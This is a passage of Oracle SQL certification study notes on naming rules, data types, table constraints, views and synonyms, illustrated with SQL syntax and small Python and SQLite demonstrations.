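first character, allowed characters, case folding, and the double-quote
escape hatch) can be summarized as a small validator. This is a sketch
of the rules as stated in these notes, not Oracle's actual parser; the
function name is hypothetical and the reserved-word set is a tiny
illustrative subset.</p>

```python
import re

# Unquoted names: a letter first, then letters, digits, _, $ or #, 30 characters at most.
UNQUOTED_NAME = re.compile(r"[A-Za-z][A-Za-z0-9_$#]{0,29}")

# Small illustrative subset only; Oracle's real reserved-word list is much longer.
RESERVED_WORDS = {"SELECT", "FROM", "WHERE", "TABLE", "DATE"}

def stored_name(name):
    """Return the name as it would be stored, or raise ValueError if it breaks the rules."""
    if name.startswith('"') and name.endswith('"'):
        inner = name[1:-1]
        # Double quotes lift every rule except the length limit.
        if len(inner) not in range(1, 31):
            raise ValueError("quoted names must be 1 to 30 characters long")
        return inner  # case and unusual characters are preserved
    if not UNQUOTED_NAME.fullmatch(name):
        raise ValueError(f"invalid unquoted name: {name!r}")
    if name.upper() in RESERVED_WORDS:
        raise ValueError(f"reserved word: {name!r}")
    return name.upper()  # unquoted names are folded to uppercase

print(stored_name("emp_2024$"))    # EMP_2024$
print(stored_name('"my table"'))   # my table
```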
<h4 id="for-numeric-data">For numeric data</h4>
<ol type="1">
<li>NUMBER .. Precision can range from 1 to 38; the scale can range
from -84 to 127. .. If the scale is negative, this has the effect of
replacing the last digits of any number inserted with zeros, which do
not count toward the number of digits specified for the precision. .. If
the number of digits exceeds the precision, there will be an error. ..
If it is within the precision but outside the scale, the number will be
rounded (up or down) to the nearest value within the scale.</li>
</ol>
<ol start="2" type="1">
<li>FLOAT -> This is an ANSI data type, floating-point number with
precision of 126 binary (or 38 decimal). Oracle also provides
BINARY_FLOAT and BINARY_DOUBLE as alternatives</li>
<li>INTEGER -> Equivalent to NUMBER, with scale zero.</li>
</ol>
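<p>The precision and scale rules for NUMBER can be checked with a small
Python model built on the standard <code>decimal</code> module. This is
a sketch under stated assumptions, not Oracle's implementation: the
helper name <code>fit_number</code> is hypothetical, and ties are
assumed to round away from zero.</p>

```python
from decimal import Decimal, ROUND_HALF_UP


def fit_number(value: str, precision: int, scale: int) -> Decimal:
    """Round value to `scale`, then check that it fits in `precision` digits."""
    # Rounding step: 0.01 for scale 2, 100 for scale -2.
    step = Decimal(1).scaleb(-scale)
    rounded = Decimal(value).quantize(step, rounding=ROUND_HALF_UP)
    # Only (precision - scale) digits are available left of the decimal point.
    if abs(rounded) >= Decimal(10) ** (precision - scale):
        raise ValueError(f"{value} does not fit NUMBER({precision},{scale})")
    return rounded


print(fit_number("123.456", 5, 2))          # 123.46 (rounded to the scale)
print(int(fit_number("12345", 5, -2)))      # 12300 (last two digits zeroed)

try:
    fit_number("1234.5", 5, 2)              # needs 6 digits at scale 2
except ValueError as exc:
    print("error:", exc)
```

<p>With a negative scale the zeros that replace the last digits do not
count toward the precision, which is why the limit is computed from
<code>precision - scale</code>.</p>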
<h4 id="for-date-and-time-fixed-length">For date and time [Fixed
Length]</h4>
<ol type="1">
<li>DATE .. This is either length zero, if the column is empty, or 7
bytes. It includes century, year, month, day, hour, minute, and second,
from January 1, 4712 BC to December 31, 9999 AD. .. Using the TRUNC
function on a date also has the effect of setting the hours, minutes,
and seconds to midnight.</li>
<li>TIMESTAMP .. Length zero if the column is empty, or up to 11 bytes.
.. Similar to DATE, but with precision of up to 9 decimal places for the
seconds, 6 places by default. .. TIMESTAMP WITH TIME ZONE - The length
may be up to 13 bytes. Oracle can calculate the difference between two
times by normalizing them to UTC, even if the times are for different
time zones. .. TIMESTAMP WITH LOCAL TIME ZONE - The data is normalized
to the database time zone on saving. When retrieved, it is normalized to
the time zone of the user process selecting it. .. INTERVAL YEAR TO
MONTH - period in years and months between two DATEs or TIMESTAMPs. ..
INTERVAL DAY TO SECOND - period in days and seconds between two DATEs or
TIMESTAMPs.</li>
</ol>
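<p>Two of the behaviours described above, truncating a date to midnight
and comparing times from different time zones by normalizing to UTC,
have close analogues in Python's <code>datetime</code> module. The
sketch below is an analogy only, not Oracle code, and the two fixed UTC
offsets are assumptions chosen for illustration.</p>

```python
from datetime import datetime, timedelta, timezone

# Analogue of TRUNC(date): keep the calendar day, reset the time to midnight.
hired = datetime(2023, 10, 1, 14, 35, 20)
truncated = hired.replace(hour=0, minute=0, second=0, microsecond=0)

# Two wall-clock times recorded with different (fixed, illustrative) offsets.
plus_0530 = timezone(timedelta(hours=5, minutes=30))
minus_0700 = timezone(timedelta(hours=-7))
t1 = datetime(2023, 10, 1, 12, 0, tzinfo=plus_0530)    # 06:30 UTC
t2 = datetime(2023, 10, 1, 8, 0, tzinfo=minus_0700)    # 15:00 UTC

# Subtracting time-zone-aware values compares the underlying UTC instants.
elapsed = t2 - t1

print(truncated)   # 2023-10-01 00:00:00
print(elapsed)     # 8:30:00
```

<p>Although 08:00 looks earlier than 12:00 on the wall clock, the
second event happened eight and a half hours later once both are
expressed in UTC.</p>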
<h4 id="for-large-object-types">For Large Object Types</h4>
<ol type="1">
<li>CLOB - size effectively unlimited: 4GB multiplied by the database
block size.</li>
<li>NCLOB - stored in the alternative national language character set,
one of the permitted Unicode character sets.</li>
<li>BLOB - binary data that will not undergo character set conversion by
Oracle Net.</li>
<li>BFILE - locator pointing to a file stored on the operating system of
the database server. The size is up to 4GB.</li>
<li>LONG - Character data in the database character set, up to 2GB. The
same functionality is provided by CLOB. .. LONGs should not be used in a
modern database and should be converted to CLOB. .. There can only be
one LONG column in a table.</li>
<li>LONG RAW - Binary data that will not be converted by Oracle Net. ..
Any LONG RAW columns should be converted to BLOBs.</li>
</ol>
<h4 id="rowid-data-type">ROWID data type</h4>
<ol type="1">
<li>Value coded in base 64 that is the pointer to the location of a row
in a table.</li>
<li>Encrypted</li>
<li>Exact physical address</li>
<li>ROWID is an Oracle proprietary data type, not visible unless
specifically selected.</li>
<li>All examinees will be expected to know about these data types:
VARCHAR2, CHAR, NUMBER, DATE, TIMESTAMP, INTERVAL, RAW, LONG, LONG RAW,
CLOB, BLOB, BFILE, and ROWID.</li>
<li>Detailed knowledge will also be needed for VARCHAR2, NUMBER and
DATE.</li>
</ol>
<h3 id="chapter-11-continued">Chapter 11 Continued</h3>
<ol type="1">
<li>Tables can be stored in the database:</li>
<li>HEAP TABLES - A heap is variable length rows in random order</li>
<li>Advanced table structures .. Index organized tables - Store rows in
the order of an index key. .. Index clusters - Can denormalize tables in
parent-child relationships so that related rows from different tables
are stored together. .. Hash clusters - Force a random distribution of
rows, which will break down any ordering based on the entry sequence. ..
Partitioned tables - Store rows in separate physical structures, the
partitions, allocating rows according to the value of a column.</li>
</ol>
<div class="sourceCode" id="cb18"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb18-1"><a aria-hidden="true" href="#cb18-1" tabindex="-1"></a><span class="kw">CREATE</span> <span class="kw">TABLE</span> [<span class="kw">schema</span>.]<span class="kw">table</span> [<span class="kw">ORGANIZATION</span> <span class="kw">HEAP</span>] <span class="op">-></span> <span class="kw">default</span> <span class="kw">and</span> <span class="kw">is</span> industry standard SQL.</span>
<span id="cb18-2"><a aria-hidden="true" href="#cb18-2" tabindex="-1"></a>(<span class="kw">column</span> datatype [<span class="kw">DEFAULT</span> expression]</span>
<span id="cb18-3"><a aria-hidden="true" href="#cb18-3" tabindex="-1"></a>[,<span class="kw">column</span> datatype [<span class="kw">DEFAULT</span> expression]<span class="op">..</span>.);</span></code></pre></div>
<ol start="4" type="1">
<li>The DEFAULT clause can be useful, but it is of limited
functionality. You cannot use a subquery to generate the default value:
you can only specify literal values or functions.</li>
<li>CREATE TABLE [schema.]table AS subquery; -> create table
employees_copy as select * from employees; .. Create a table
EMPLOYEES_COPY, which is an exact copy of the EMPLOYEES table, identical
in both definition and the rows it contains. .. Any not null and check
constraints on the columns will also be applied to the new table, but
any primary-key, unique, or foreign-key constraints will not be</li>
<li>Altering table definitions after creation .. All of the changes
shown next are DDL commands with a built-in COMMIT.</li>
</ol>
<div class="sourceCode" id="cb19"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb19-1"><a aria-hidden="true" href="#cb19-1" tabindex="-1"></a><span class="kw">alter</span> <span class="kw">table</span> emp <span class="kw">add</span> (job_id <span class="dt">number</span>); <span class="op">-></span> Adding a <span class="kw">column</span></span>
<span id="cb19-2"><a aria-hidden="true" href="#cb19-2" tabindex="-1"></a><span class="kw">alter</span> <span class="kw">table</span> emp <span class="kw">modify</span> (comm <span class="dt">number</span>(<span class="dv">4</span>,<span class="dv">2</span>) <span class="kw">default</span> <span class="fl">0.05</span>); <span class="op">-></span> modifying a <span class="kw">column</span></span>
<span id="cb19-3"><a aria-hidden="true" href="#cb19-3" tabindex="-1"></a><span class="kw">alter</span> <span class="kw">table</span> emp <span class="kw">drop</span> <span class="kw">column</span> comm; <span class="op">-></span> dropping a <span class="kw">column</span></span>
<span id="cb19-4"><a aria-hidden="true" href="#cb19-4" tabindex="-1"></a><span class="kw">alter</span> <span class="kw">table</span> emp <span class="kw">set</span> <span class="kw">unused</span> <span class="kw">column</span> job_id; <span class="op">-></span> Marking <span class="kw">column</span> <span class="kw">as</span> <span class="kw">unused</span></span>
<span id="cb19-5"><a aria-hidden="true" href="#cb19-5" tabindex="-1"></a><span class="kw">alter</span> <span class="kw">table</span> emp <span class="kw">rename</span> <span class="kw">column</span> hiredate <span class="kw">to</span> recruited; <span class="op">-></span> Renaming <span class="kw">the</span> <span class="kw">column</span></span>
<span id="cb19-6"><a aria-hidden="true" href="#cb19-6" tabindex="-1"></a><span class="kw">alter</span> <span class="kw">table</span> emp <span class="kw">read</span> <span class="kw">only</span>; <span class="op">-></span> marking <span class="kw">table</span> <span class="kw">as</span> <span class="kw">read</span><span class="op">-</span><span class="kw">only</span></span></code></pre></div>
<ol start="6" type="1">
<li>Dropping a column can be a time-consuming exercise because as each
column is dropped, every row must be restructured to remove the column’s
data.</li>
<li>The SET UNUSED command, which makes columns nonexistent as far as
SQL is concerned, is often a better alternative, followed when
convenient by <code>ALTER TABLE tablename DROP UNUSED COLUMNS;</code>
which will drop all the unused columns in one pass through the
table.</li>
<li>Marking a table as read-only will cause errors for any attempted DML
commands. But the table can still be dropped.</li>
<li>DROP TABLE [schema.]tablename ; -> it includes a COMMIT. .. If
any session (even your own) has a transaction in progress that includes
a row in the table, then the DROP will fail. .. It is also impossible to
drop a table that is referred to in a foreign key constraint defined for
another table. That other table (or the constraint) must be dropped
first.</li>
<li>The constraint types</li>
</ol>
<div class="sourceCode" id="cb20"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb20-1"><a aria-hidden="true" href="#cb20-1" tabindex="-1"></a><span class="kw">UNIQUE</span></span>
<span id="cb20-2"><a aria-hidden="true" href="#cb20-2" tabindex="-1"></a><span class="kw">NOT</span> <span class="kw">NULL</span></span>
<span id="cb20-3"><a aria-hidden="true" href="#cb20-3" tabindex="-1"></a><span class="kw">PRIMARY</span> <span class="kw">KEY</span></span>
<span id="cb20-4"><a aria-hidden="true" href="#cb20-4" tabindex="-1"></a><span class="kw">FOREIGN</span> <span class="kw">KEY</span></span>
<span id="cb20-5"><a aria-hidden="true" href="#cb20-5" tabindex="-1"></a><span class="kw">CHECK</span></span></code></pre></div>
<p><em>If a name is not provided, Oracle generates the constraint
name.</em></p>
<ol start="11" type="1">
<li>An oddity of unique constraints is that it is possible to enter a
NULL value into the key column(s); it is indeed possible to have any
number of rows with NULL values in their key column(s)</li>
<li>Unique constraints are enforced by an index. When a unique
constraint is defined, Oracle will look for an index on the key
column(s), and if one does not exist it will be created.</li>
<li>The structure of these indexes (known as B*Tree indexes) does not
include NULL values, which is why many rows with NULL are permitted:
they simply do not exist in the index.</li>
<li>Selecting WHERE key_column IS NULL cannot use the index because it
doesn’t include the NULLs and will therefore always result in a scan of
the entire table.</li>
<li>Not null constraints are defined per column: you CANNOT define one
not null constraint for a whole group of columns, but instead must
define a not null constraint for each column.</li>
<li>It is possible to bypass the need to specify a value for a not null
column by including a DEFAULT clause on the column when creating the
table.</li>
<li>The relational database paradigm includes a requirement that every
table should have a primary key, a column (or combination of columns)
that can be used to distinguish every row. .. The Oracle database
deviates from the paradigm (as do some other RDBMS implementations) by
permitting tables without primary keys</li>
<li>A table can have only one primary key. Try to create a second, and
you will get an error. A table can, however, have any number of unique
constraints and not null columns.</li>
<li>A primary key constraint is a unique constraint combined with a not
null constraint.</li>
<li>Foreign Key Constraints - The columns do not have to have the same
names, but they must be of the same data type.</li>
<li>Attempting to insert a row in the child table for which there is no
matching row in the parent table will give an error. .. Similarly,
deleting a row in the parent table will give an error if there are
already rows referring to it in the child table</li>
<li>The constraint may be created as ON DELETE CASCADE. .. This means
that if a row in the parent table is deleted, Oracle will search the
child table for all the matching rows and delete them too.</li>
<li>ON DELETE SET NULL. .. If a row in the parent table is deleted,
Oracle will search the child table for all the matching rows and set the
foreign key columns to null. .. This means that the child rows will be
orphaned, but will still exist. .. If the columns in the child table
also have a not null constraint, then the deletion from the parent table
will fail.</li>
<li>It is not possible to drop or truncate the parent table in a foreign
key relationship, even if there are no rows in the child table. .. This
still applies if the ON DELETE SET NULL or ON DELETE CASCADE clauses
were used.</li>
<li>Check Constraints -> The rule must be an expression which will
evaluate to TRUE or FALSE .. The rules can refer to absolute values
entered as literals or to other columns in the same row and may make use
of some functions. .. As many check constraints as you want can be
applied to one column, but it is not possible to use a subquery to
evaluate whether a value is permissible or to use functions such as
SYSDATE. .. The not null constraint is in fact implemented as a
preconfigured check constraint.</li>
<li>If you really need to make the change in a hurry, ask the database
administrator to quiesce the database: this is a process that will
freeze all user sessions. .. If you are very quick, you can make the
change and then unquiesce the database before end users complain.</li>
<li>Example</li>
</ol>
<div class="sourceCode" id="cb21"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb21-1"><a aria-hidden="true" href="#cb21-1" tabindex="-1"></a><span class="kw">create</span> <span class="kw">table</span> dept(</span>
<span id="cb21-2"><a aria-hidden="true" href="#cb21-2" tabindex="-1"></a>deptno <span class="dt">number</span>(<span class="dv">2</span>,<span class="dv">0</span>) <span class="kw">constraint</span> dept_deptno_pk <span class="kw">primary</span> <span class="kw">key</span> <span class="op">-></span> <span class="kw">CONSTRAINT</span> CONSTRAINT_NAME <span class="kw">PRIMARY</span> <span class="kw">KEY</span></span>
<span id="cb21-3"><a aria-hidden="true" href="#cb21-3" tabindex="-1"></a><span class="kw">constraint</span> dept_deptno_ck <span class="kw">check</span> (deptno <span class="kw">between</span> <span class="dv">10</span> <span class="kw">and</span> <span class="dv">90</span>), <span class="op">-></span> <span class="kw">CONSTRAINT</span> CONSTRAINT_NAME <span class="kw">CHECK</span> (COLUMN_NAME <span class="kw">BETWEEN</span> <span class="dv">10</span> <span class="kw">AND</span> <span class="dv">90</span>)</span>
<span id="cb21-4"><a aria-hidden="true" href="#cb21-4" tabindex="-1"></a>dname <span class="dt">varchar2</span>(<span class="dv">20</span>) <span class="kw">constraint</span> dept_dname_nn <span class="kw">not</span> <span class="kw">null</span>); <span class="op">-></span> <span class="kw">CONSTRAINT</span> CONSTRAINT_NAME <span class="kw">NOT</span> <span class="kw">NULL</span></span>
<span id="cb21-5"><a aria-hidden="true" href="#cb21-5" tabindex="-1"></a></span>
<span id="cb21-6"><a aria-hidden="true" href="#cb21-6" tabindex="-1"></a></span>
<span id="cb21-7"><a aria-hidden="true" href="#cb21-7" tabindex="-1"></a><span class="kw">create</span> <span class="kw">table</span> emp(</span>
<span id="cb21-8"><a aria-hidden="true" href="#cb21-8" tabindex="-1"></a>empno <span class="dt">number</span>(<span class="dv">4</span>,<span class="dv">0</span>) <span class="kw">constraint</span> emp_empno_pk <span class="kw">primary</span> <span class="kw">key</span>,</span>
<span id="cb21-9"><a aria-hidden="true" href="#cb21-9" tabindex="-1"></a>ename <span class="dt">varchar2</span>(<span class="dv">20</span>) <span class="kw">constraint</span> emp_ename_nn <span class="kw">not</span> <span class="kw">null</span>,</span>
<span id="cb21-10"><a aria-hidden="true" href="#cb21-10" tabindex="-1"></a>mgr <span class="dt">number</span> (<span class="dv">4</span>,<span class="dv">0</span>) <span class="kw">constraint</span> emp_mgr_fk <span class="kw">references</span> emp (empno), <span class="op">-></span> <span class="kw">CONSTRAINT</span> CONSTRAINT_NAME <span class="kw">REFERENCES</span> TABLE_NAME (COLUMN_NAME)</span>
<span id="cb21-11"><a aria-hidden="true" href="#cb21-11" tabindex="-1"></a>dob <span class="dt">date</span>,</span>
<span id="cb21-12"><a aria-hidden="true" href="#cb21-12" tabindex="-1"></a>hiredate <span class="dt">date</span>,</span>
<span id="cb21-13"><a aria-hidden="true" href="#cb21-13" tabindex="-1"></a>deptno <span class="dt">number</span>(<span class="dv">2</span>,<span class="dv">0</span>) <span class="kw">constraint</span> emp_deptno_fk <span class="kw">references</span> dept(deptno)</span>
<span id="cb21-14"><a aria-hidden="true" href="#cb21-14" tabindex="-1"></a><span class="kw">on</span> <span class="kw">delete</span> <span class="kw">set</span> <span class="kw">null</span>,</span>
<span id="cb21-15"><a aria-hidden="true" href="#cb21-15" tabindex="-1"></a>email <span class="dt">varchar2</span>(<span class="dv">30</span>) <span class="kw">constraint</span> emp_email_uk <span class="kw">unique</span>, <span class="op">-></span> <span class="kw">CONSTRAINT</span> CONSTRAINT_NAME <span class="kw">UNIQUE</span></span>
<span id="cb21-16"><a aria-hidden="true" href="#cb21-16" tabindex="-1"></a></span>
<span id="cb21-17"><a aria-hidden="true" href="#cb21-17" tabindex="-1"></a><span class="co">/* ADDING ADDITIONAL CONSTRAINTS AT THE </span><span class="re">END</span><span class="co"> */</span></span>
<span id="cb21-18"><a aria-hidden="true" href="#cb21-18" tabindex="-1"></a></span>
<span id="cb21-19"><a aria-hidden="true" href="#cb21-19" tabindex="-1"></a><span class="kw">constraint</span> emp_hiredate_ck <span class="kw">check</span> (hiredate <span class="op">>=</span> dob <span class="op">+</span> <span class="dv">365</span><span class="op">*</span><span class="dv">16</span>),</span>
<span id="cb21-20"><a aria-hidden="true" href="#cb21-20" tabindex="-1"></a><span class="kw">constraint</span> emp_email_ck</span>
<span id="cb21-21"><a aria-hidden="true" href="#cb21-21" tabindex="-1"></a><span class="kw">check</span> ((<span class="fu">instr</span>(email,<span class="st">'@'</span>) <span class="op">></span> <span class="dv">0</span>) <span class="kw">and</span> (<span class="fu">instr</span>(email,<span class="st">'.'</span>) <span class="op">></span> <span class="dv">0</span>)));</span></code></pre></div>
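<p>The foreign key and unique constraint behaviour described above can
be tried without an Oracle instance. The sketch below uses Python's
built-in <code>sqlite3</code> module as a stand-in, so it is SQLite, not
Oracle: the column types are SQLite's, foreign key enforcement has to be
switched on with a PRAGMA, and the tables are a cut-down version of the
DEPT and EMP example. For these particular rules the two databases are
expected to agree.</p>

```python
import sqlite3

conn = sqlite3.connect(":memory:")
# SQLite-specific: foreign keys are not enforced unless this is enabled.
conn.execute("PRAGMA foreign_keys = ON")
conn.executescript("""
    CREATE TABLE dept (
        deptno INTEGER CONSTRAINT dept_deptno_pk PRIMARY KEY,
        dname  TEXT    CONSTRAINT dept_dname_nn NOT NULL
    );
    CREATE TABLE emp (
        empno  INTEGER CONSTRAINT emp_empno_pk PRIMARY KEY,
        ename  TEXT    CONSTRAINT emp_ename_nn NOT NULL,
        deptno INTEGER CONSTRAINT emp_deptno_fk REFERENCES dept (deptno)
                       ON DELETE SET NULL,
        email  TEXT    CONSTRAINT emp_email_uk UNIQUE
    );
    INSERT INTO dept VALUES (10, 'SALES');
    INSERT INTO emp VALUES (1, 'KING',  10, NULL);
    INSERT INTO emp VALUES (2, 'BLAKE', 10, NULL);  -- a second NULL email is accepted
""")

# A child row with no matching parent row is rejected.
try:
    conn.execute("INSERT INTO emp VALUES (3, 'CLARK', 99, NULL)")
    orphan_rejected = False
except sqlite3.IntegrityError:
    orphan_rejected = True

# ON DELETE SET NULL: deleting the parent orphans the children, it does not delete them.
conn.execute("DELETE FROM dept WHERE deptno = 10")
rows = conn.execute("SELECT empno, deptno FROM emp ORDER BY empno").fetchall()

print(orphan_rejected, rows)   # True [(1, None), (2, None)]
```

<p>Changing the clause to <code>ON DELETE CASCADE</code> in the same
sketch would leave the EMP table empty after the delete.</p>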
<ol start="28" type="1">
<li>Stored procedures, synonyms, tables, and views exist in the same
namespace.</li>
<li>A heap is a table of variable length rows in random order. A heap
table can only be one table. A heap table can (and usually will) have
indexes and a primary key.</li>
<li>BLOB, LONG, NUMBER, RAW and VARCHAR2 are variable length. CHAR is
fixed length</li>
<li>CHAR, FLOAT, and INTEGER are all internal data types, though not as
widely used as some others.</li>
<li><code>create table newtab as select * from tab;</code> .. Check and
not null constraints are not dependent on any structures other than the
table to which they apply and so can safely be copied to a new table. ..
Primary key and unique constraints WILL NOT be copied as they are
dependent on other structures</li>
<li>Unique and primary key constraints are enforced with indexes. ..
Check and not null constraints do not rely on indexes.</li>
<li>Constraint violation will force a roll back of the current statement
but nothing else even if the transaction consists of more than one
statement</li>
</ol>
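<p>The last point, that a constraint violation rolls back only the
failing statement and not the rest of the transaction, can be
illustrated with Python's built-in <code>sqlite3</code> module. This is
SQLite standing in for Oracle, and the table <code>t</code> and its
check constraint are hypothetical; SQLite's default handling of a
constraint failure follows the same statement-level rule.</p>

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE t (id INTEGER PRIMARY KEY, "
    "qty INTEGER CONSTRAINT t_qty_ck CHECK (qty > 0))"
)

conn.execute("INSERT INTO t VALUES (1, 5)")        # statement 1 succeeds
try:
    # Statement 2: the second row breaks the check, so both of its rows are undone.
    conn.execute("INSERT INTO t VALUES (2, 7), (3, -1)")
except sqlite3.IntegrityError as exc:
    print("rejected:", exc)
conn.execute("INSERT INTO t VALUES (4, 9)")        # statement 3 succeeds
conn.commit()                                      # the transaction itself survives

ids = [row[0] for row in conn.execute("SELECT id FROM t ORDER BY id")]
print(ids)   # [1, 4]
```

<p>Row 2 was valid on its own, but it disappears together with row 3
because the unit that is rolled back is the statement, not the
individual row and not the whole transaction.</p>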
<h3 id="chapter-12">Chapter 12</h3>
<ol type="1">
<li>A View looks like a table: a two-dimensional structure of rows of
columns, against which the user can run SELECT and DML statements.</li>
<li>It can join tables, perform aggregations, or do sorts; absolutely
anything that is legal in the SELECT command can be used. However, if
the view is complex, then only SELECT statements can be run against
it</li>
<li>Views share the same namespace as tables. But DML operations will
not always succeed.</li>
<li>Use of Views: .. Security. .. Simplifying user SQL. .. Preventing
error. .. Making data comprehensible. Table and column names are often
long and pretty meaningless. .. The view and its columns can be much
more obvious. .. Performance.</li>
<li>A nested loop join uses an index to get to individual rows; a hash
join reads the whole table into memory.</li>
<li>Create View syntax</li>
</ol>
<div class="sourceCode" id="cb22"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb22-1"><a aria-hidden="true" href="#cb22-1" tabindex="-1"></a><span class="kw">create</span> <span class="kw">view</span> dept_emp <span class="kw">as</span></span>
<span id="cb22-2"><a aria-hidden="true" href="#cb22-2" tabindex="-1"></a><span class="kw">select</span> <span class="co">/*+USE_HASH (employees departments)*/</span> department_name, last_name</span>
<span id="cb22-3"><a aria-hidden="true" href="#cb22-3" tabindex="-1"></a><span class="kw">from</span> departments <span class="kw">natural</span> <span class="kw">join</span> employees;</span></code></pre></div>
<ol start="7" type="1">
<li>A simple view draws data from one detail table, uses no functions,
and does no aggregation. -> DML statements work .. A complex view can
join detail tables, use functions, and perform aggregations. -> DML
statements won’t work</li>
<li>If the view does not include a column that has a NOT NULL
constraint, then an INSERT through the view cannot succeed (unless the
column has a default value). .. This can produce a disconcerting effect
because the error message will refer to a table and a column that are
not mentioned in the statement</li>
<li>Full syntax with options</li>
</ol>
<div class="sourceCode" id="cb23"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb23-1"><a aria-hidden="true" href="#cb23-1" tabindex="-1"></a><span class="kw">CREATE</span> [<span class="kw">OR</span> <span class="kw">REPLACE</span>] [<span class="kw">FORCE</span> | <span class="kw">NOFORCE</span>] <span class="kw">VIEW</span></span>
<span id="cb23-2"><a aria-hidden="true" href="#cb23-2" tabindex="-1"></a> [<span class="kw">schema</span>.]viewname [(alias [,alias]…)]</span>
<span id="cb23-3"><a aria-hidden="true" href="#cb23-3" tabindex="-1"></a> <span class="kw">AS</span> subquery</span>
<span id="cb23-4"><a aria-hidden="true" href="#cb23-4" tabindex="-1"></a> [<span class="kw">WITH</span> <span class="kw">CHECK</span> <span class="kw">OPTION</span> [<span class="kw">CONSTRAINT</span> constraintname]]</span>
<span id="cb23-5"><a aria-hidden="true" href="#cb23-5" tabindex="-1"></a> [<span class="kw">WITH</span> <span class="kw">READ</span> <span class="kw">ONLY</span> [<span class="kw">CONSTRAINT</span> constraintname]] ;</span>
<span id="cb23-6"><a aria-hidden="true" href="#cb23-6" tabindex="-1"></a> <span class="kw">REPLACE</span> <span class="op">-></span> replacing <span class="kw">the</span> <span class="kw">view</span></span>
<span id="cb23-7"><a aria-hidden="true" href="#cb23-7" tabindex="-1"></a> <span class="kw">FORCE</span> <span class="kw">or</span> <span class="kw">NOFORCE</span> <span class="op">-></span></span>
<span id="cb23-8"><a aria-hidden="true" href="#cb23-8" tabindex="-1"></a> <span class="kw">The</span> <span class="kw">FORCE</span> keyword will <span class="kw">create</span> <span class="kw">the</span> <span class="kw">view</span> even <span class="cf">if</span> <span class="kw">the</span> detail <span class="kw">table</span>(s) <span class="kw">in</span> <span class="kw">the</span> subquery does <span class="kw">not</span> exist.</span>
<span id="cb23-9"><a aria-hidden="true" href="#cb23-9" tabindex="-1"></a> <span class="kw">NOFORCE</span> <span class="kw">is</span> <span class="kw">the</span> <span class="kw">default</span> <span class="kw">and</span> will cause an error <span class="cf">if</span> <span class="kw">the</span> detail <span class="kw">table</span> does <span class="kw">not</span> exist.</span>
<span id="cb23-10"><a aria-hidden="true" href="#cb23-10" tabindex="-1"></a> <span class="kw">WITH</span> <span class="kw">CHECK</span> <span class="kw">OPTION</span></span>
<span id="cb23-11"><a aria-hidden="true" href="#cb23-11" tabindex="-1"></a> <span class="cf">If</span> <span class="kw">the</span> subquery includes a <span class="kw">WHERE</span> clause, <span class="cf">then</span> this <span class="kw">option</span> will prevent insertion <span class="kw">of</span> <span class="kw">rows</span></span>
<span id="cb23-12"><a aria-hidden="true" href="#cb23-12" tabindex="-1"></a> that wouldn’t be seen <span class="kw">in</span> <span class="kw">the</span> <span class="kw">view</span> <span class="kw">or</span> updates that would cause a <span class="kw">row</span> <span class="kw">to</span> disappear <span class="kw">from</span> <span class="kw">the</span> <span class="kw">view</span>.</span>
<span id="cb23-13"><a aria-hidden="true" href="#cb23-13" tabindex="-1"></a> <span class="kw">By</span> <span class="kw">default</span>, this <span class="kw">option</span> <span class="kw">is</span> <span class="kw">not</span> enabled, which can give disconcerting results.</span>
<span id="cb23-14"><a aria-hidden="true" href="#cb23-14" tabindex="-1"></a> <span class="kw">WITH</span> <span class="kw">READ</span> <span class="kw">ONLY</span></span>
<span id="cb23-15"><a aria-hidden="true" href="#cb23-15" tabindex="-1"></a></span>
<span id="cb23-16"><a aria-hidden="true" href="#cb23-16" tabindex="-1"></a> <span class="kw">CONSTRAINT</span> constraintname</span>
<span id="cb23-17"><a aria-hidden="true" href="#cb23-17" tabindex="-1"></a> name <span class="kw">the</span> <span class="kw">WITH</span> <span class="kw">CHECK</span> <span class="kw">OPTION</span> <span class="kw">and</span> <span class="kw">WITH</span> <span class="kw">READ</span> <span class="kw">ONLY</span> restrictions <span class="cf">for</span> better error messages</span></code></pre></div>
<ol start="10" type="1">
<li><p>The main use of the ALTER VIEW command is to compile the view. A
view must be compiled successfully before it can be used .. When a view
is created, Oracle will check that the detail tables and the necessary
columns on which the view is based do exist. .. If they do not, the
compilation fails and the view will not be created, unless you use the
FORCE option. .. In that case, the view will be created but will be
unusable until the tables or columns to which it refers are created and
the view is successfully compiled. .. When an invalid view is queried,
Oracle will attempt to compile it automatically. .. If the compilation
succeeds because the problem has been fixed, the user won’t know there
was ever a problem</p>
<p><code>ALTER VIEW HR.ex_staff compile;</code></p></li>
<li><p><code>DROP VIEW [schema.]viewname ;</code></p></li>
<li><p>A synonym is an alternative name for an object. .. Use of
synonyms means that an application can function for any user,
irrespective of which schema owns the views and tables or even in which
database the tables reside.</p></li>
<li><p><code>select * from hr.employees@prod;</code> .. database link
PROD (means of accessing objects in a database other than that onto
which you are logged)</p></li>
<li><p>Public Synonym: -> data independence and location transparency
<code>create public synonym emp for hr.employees@prod;</code> .. All the
user (any user!) need enter is the following:
<code>select * from emp;</code></p></li>
<li><p>As well as SELECT statements, DML statements can address synonyms
as though they were the object to which they refer.</p></li>
<li><p>Private synonyms are schema objects. Either they must be in your
own schema, or they must be qualified with the schema name.</p></li>
<li><p>Public synonyms exist independently of a schema. .. A public
synonym can be referred to by any user to whom permission has been
granted to see it without the need to qualify it with a schema name. ..
Private synonyms must be a unique name within their schema. .. Public
synonyms can have the same name as schema objects. .. When executing
statements that address objects without a schema qualifier, Oracle will
first look for the object in the local schema, and only if it cannot be
found will it look for a public synonym.</p></li>
<li><p><code>CREATE [PUBLIC] SYNONYM synonym FOR object ;</code></p></li>
<li><p>The “public” in “public synonym” means that it is not a schema
object and cannot therefore be prefixed with a schema name. It does not
mean that everyone has permissions against it.</p></li>
<li><p>A user will need to have been granted permission to create
private synonyms and further permission to create public synonyms. ..
Usually, only the database administrator can create (or drop) public
synonyms</p></li>
<li><p><code>DROP [PUBLIC] SYNONYM synonym ;</code></p></li>
<li><p>If the object to which a synonym refers (the table or view) is
dropped, the synonym continues to exist. .. Any attempt to use it will
return an error. In this respect, synonyms behave in the same way as
views. .. If the object is recreated, the synonym must be recompiled
before use</p>
<p><code>ALTER SYNONYM synonym COMPILE;</code></p></li>
